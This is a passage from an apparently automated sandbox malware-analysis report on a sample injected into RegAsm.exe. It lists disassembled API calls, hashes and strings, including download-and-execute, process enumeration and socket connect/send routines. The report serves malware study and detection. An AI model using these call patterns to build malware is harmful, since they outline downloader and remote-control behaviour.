  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
Strings
Memory Dump Source
• Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
• String ID: KeepAlive | Disabled
• API String ID: 2993684571-305739064
APIs
  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
• GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041ADF2
• PlaySoundW.WINMM(00000000,00000000), ref: 0041AE00
• Sleep.KERNEL32(00002710), ref: 0041AE07
• PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AE10
Strings
Memory Dump Source
• Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: PlaySound$HandleLocalModuleSleepTime
• String ID: Alarm triggered
• API String ID: 614609389-2816303416
                                                                        APIs
                                                                        • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CDED), ref: 0041CD62
                                                                        • GetConsoleScreenBufferInfo.KERNEL32 ref: 0041CD6F
                                                                        • SetConsoleTextAttribute.KERNEL32(00000000,0000000C), ref: 0041CD7C
                                                                        • SetConsoleTextAttribute.KERNEL32(00000000,?), ref: 0041CD8F
                                                                        Strings
                                                                        • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CD82
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                        • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                        • API String ID: 3024135584-2418719853
                                                                        • Opcode ID: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                                                                        • Instruction ID: 0b88db63cd78dea0703aeaf814a7171c31f7e2e6e0b1944ffb711cb25cf7542c
                                                                        • Opcode Fuzzy Hash: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                                                                        • Instruction Fuzzy Hash: B4E04872904315E7E31027B5EC4DDAB7B7CE745713B100266FA12915D39A749C40C6B5
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
                                                                        • Instruction ID: 3288ceb70b28299b768e57bc56a65f905b411dc47ae91625c595fe6b39b3afde
                                                                        • Opcode Fuzzy Hash: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
                                                                        • Instruction Fuzzy Hash: 4D71C431900256ABEF21CF55C884AFFBBB5EF95350F14012BE812A72A1D7748CC1CBA9
                                                                        APIs
                                                                          • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                                        • _free.LIBCMT ref: 00444E06
                                                                        • _free.LIBCMT ref: 00444E1D
                                                                        • _free.LIBCMT ref: 00444E3C
                                                                        • _free.LIBCMT ref: 00444E57
                                                                        • _free.LIBCMT ref: 00444E6E
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 3033488037-0
                                                                        • Opcode ID: d775a197f71d536e5d52874a7a30662ad33d8ad4d8240f212ad1ffb4432d1cba
                                                                        • Instruction ID: 75a60bec03265776b93b53542ea819fdab521e44af267d44e1f719a945e8e2e2
                                                                        • Opcode Fuzzy Hash: d775a197f71d536e5d52874a7a30662ad33d8ad4d8240f212ad1ffb4432d1cba
                                                                        • Instruction Fuzzy Hash: 5451D371A00704AFEB20DF6AC841B6673F4FF85729B14456EE819D7250E739EE01CB88
                                                                        APIs
                                                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                                                        • _free.LIBCMT ref: 004493BD
                                                                          • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                                                                          • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                                        • _free.LIBCMT ref: 00449589
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                        • String ID:
                                                                        • API String ID: 1286116820-0
                                                                        • Opcode ID: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                                                                        • Instruction ID: c95a83c4fc9d8f5f381c6ef12c4bd90d50aad01b0883e3b7d6e96279f2ead045
                                                                        • Opcode Fuzzy Hash: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                                                                        • Instruction Fuzzy Hash: 71511A71904205EBEB14EFA9DD819AFB7BCEF44324F10066FE51493291EB788E42DB58
                                                                        APIs
                                                                          • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                                                          • Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F91B
                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 0040F93F
                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F94E
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0040FB05
                                                                          • Part of subcall function 0041BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F5F9,00000000,?,?,00475338), ref: 0041BFFA
                                                                          • Part of subcall function 0041BFE5: IsWow64Process.KERNEL32(00000000,?,?,?,00475338), ref: 0041C005
                                                                          • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                                                          • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FAF6
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                        • String ID:
                                                                        • API String ID: 2180151492-0
                                                                        • Opcode ID: 0b43284b76afbd96f76b9be0043a8eca87360fa06686d1bf4d8bb099c383738a
                                                                        • Instruction ID: d179df5438ecf7187d550cf9263b6860c2801d48d571b2859f9d543a591e132f
                                                                        • Opcode Fuzzy Hash: 0b43284b76afbd96f76b9be0043a8eca87360fa06686d1bf4d8bb099c383738a
                                                                        • Instruction Fuzzy Hash: 784116311083419BC325F722DC55AEFB3A5AF94345F50493EF48A921E2EF385A49C75A
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free
                                                                        • String ID:
                                                                        • API String ID: 269201875-0
                                                                        • Opcode ID: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                                                                        • Instruction ID: 5dce3a056f7b38871bf3701478ebec2c01ef4ac0d1e4adeac0a27022f106ca0c
                                                                        • Opcode Fuzzy Hash: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                                                                        • Instruction Fuzzy Hash: 0741F536A012009FEB20DF78C881A5EB3F1EF89B14F2545AEE515EB341DB35AE01CB84
                                                                        APIs
                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01), ref: 00451179
                                                                        • __alloca_probe_16.LIBCMT ref: 004511B1
                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?), ref: 00451202
                                                                        • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?,00000002,00000000), ref: 00451214
                                                                        • __freea.LIBCMT ref: 0045121D
                                                                          • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                        • String ID:
                                                                        • API String ID: 313313983-0
                                                                        • Opcode ID: 176232f54f3ec98bfb029651777c0c6490447229ae5715771154ed3ce12be0f5
                                                                        • Instruction ID: 2862a929c21554b3885a63a70f5d1b49ed21d23a3953ed9914841bfcf42aa681
                                                                        • Opcode Fuzzy Hash: 176232f54f3ec98bfb029651777c0c6490447229ae5715771154ed3ce12be0f5
                                                                        • Instruction Fuzzy Hash: 6631D271A0020AABDF24DFA5DC41EAF7BA5EB04315F0445AAFC04D72A2E739CD55CB94
                                                                        APIs
                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 0044F363
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F386
                                                                          • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F3AC
                                                                        • _free.LIBCMT ref: 0044F3BF
                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F3CE
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                        • String ID:
                                                                        • API String ID: 336800556-0
                                                                        • Opcode ID: 5a321bf6ad982bb41f22afd847bffa7b7f2aa598f804dd442cdb837d811de21f
                                                                        • Instruction ID: 8337c1946637dec1c7c9c61cb05458c13fbc509b7d73539ecc926bc10a2836fd
                                                                        • Opcode Fuzzy Hash: 5a321bf6ad982bb41f22afd847bffa7b7f2aa598f804dd442cdb837d811de21f
                                                                        • Instruction Fuzzy Hash: 2301B173601755BB37211ABA5C8CC7F6A6CDAC6FA5315013FFD14C2202EA68CD0581B9
                                                                        APIs
                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                                                                          • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                                                                        • _free.LIBCMT ref: 100071B8
                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                        • String ID:
                                                                        • API String ID: 336800556-0
                                                                        • Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                        • Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
                                                                        • Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                        • Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
                                                                        APIs
                                                                        • GetLastError.KERNEL32(?,00000000,00000000,0043BC87,00000000,00000000,?,0043BD0B,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044829E
                                                                        • _free.LIBCMT ref: 004482D3
                                                                        • _free.LIBCMT ref: 004482FA
                                                                        • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448307
                                                                        • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448310
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorLast$_free
                                                                        • String ID:
                                                                        • API String ID: 3170660625-0
                                                                        • Opcode ID: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
                                                                        • Instruction ID: 817e1e76de570c2b023109a843fda652767a1b5a915d0172e9d2adf04509528a
                                                                        • Opcode Fuzzy Hash: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
                                                                        • Instruction Fuzzy Hash: 5601F936500B0067F3112A2A5C8596F2559EBC2B7A735452FFD19A22D2EFADCC01816D
                                                                        APIs
                                                                        • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                                                                        • _free.LIBCMT ref: 10005BB4
                                                                        • _free.LIBCMT ref: 10005BDB
                                                                        • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                                                                        • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$_free
                                                                        • String ID:
                                                                        • API String ID: 3170660625-0
                                                                        • Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                        • Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
                                                                        • Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                        • Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
                                                                        APIs
                                                                        • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                                                        • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                                                        • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041C228
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0041C233
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0041C23B
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Process$CloseHandleOpen$FileImageName
                                                                        • String ID:
                                                                        • API String ID: 2951400881-0
                                                                        APIs
                                                                        • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                        • lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                                                        • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                        • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                        • lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen$lstrcat
                                                                        • String ID:
                                                                        • API String ID: 493641738-0
                                                                        APIs
                                                                        • _free.LIBCMT ref: 004509D4
                                                                          • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                                                                          • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                                        • _free.LIBCMT ref: 004509E6
                                                                        • _free.LIBCMT ref: 004509F8
                                                                        • _free.LIBCMT ref: 00450A0A
                                                                        • _free.LIBCMT ref: 00450A1C
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                        • String ID:
                                                                        • API String ID: 776569668-0
                                                                        APIs
                                                                        • _free.LIBCMT ref: 100091D0
                                                                          • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                          • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                        • _free.LIBCMT ref: 100091E2
                                                                        • _free.LIBCMT ref: 100091F4
                                                                        • _free.LIBCMT ref: 10009206
                                                                        • _free.LIBCMT ref: 10009218
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                        • String ID:
                                                                        • API String ID: 776569668-0
                                                                        APIs
                                                                        • _free.LIBCMT ref: 00444066
                                                                          • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                                                                          • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                                        • _free.LIBCMT ref: 00444078
                                                                        • _free.LIBCMT ref: 0044408B
                                                                        • _free.LIBCMT ref: 0044409C
                                                                        • _free.LIBCMT ref: 004440AD
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                        • String ID:
                                                                        • API String ID: 776569668-0
                                                                        APIs
                                                                        • _free.LIBCMT ref: 1000536F
                                                                          • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                          • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                        • _free.LIBCMT ref: 10005381
                                                                        • _free.LIBCMT ref: 10005394
                                                                        • _free.LIBCMT ref: 100053A5
                                                                        • _free.LIBCMT ref: 100053B6
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                        • String ID:
                                                                        • API String ID: 776569668-0
                                                                        APIs
                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FBC
                                                                        • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070A0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: DownloadExecuteFileShell
                                                                        • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$open
                                                                        • API String ID: 2825088817-3056885514
                                                                        APIs
                                                                        • _strpbrk.LIBCMT ref: 0044E738
                                                                        • _free.LIBCMT ref: 0044E855
                                                                          • Part of subcall function 0043BD19: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043BD1B
                                                                          • Part of subcall function 0043BD19: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD3D
                                                                          • Part of subcall function 0043BD19: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD44
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                        • String ID: *?$.
                                                                        • API String ID: 2812119850-3972193922
                                                                        APIs
                                                                        • GetKeyboardLayoutNameA.USER32(?), ref: 00409ED3
                                                                          • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,00B64958,00000010), ref: 004048E0
                                                                          • Part of subcall function 0041C515: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041C52A
                                                                          • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                        Strings
                                                                        Memory Dump Source
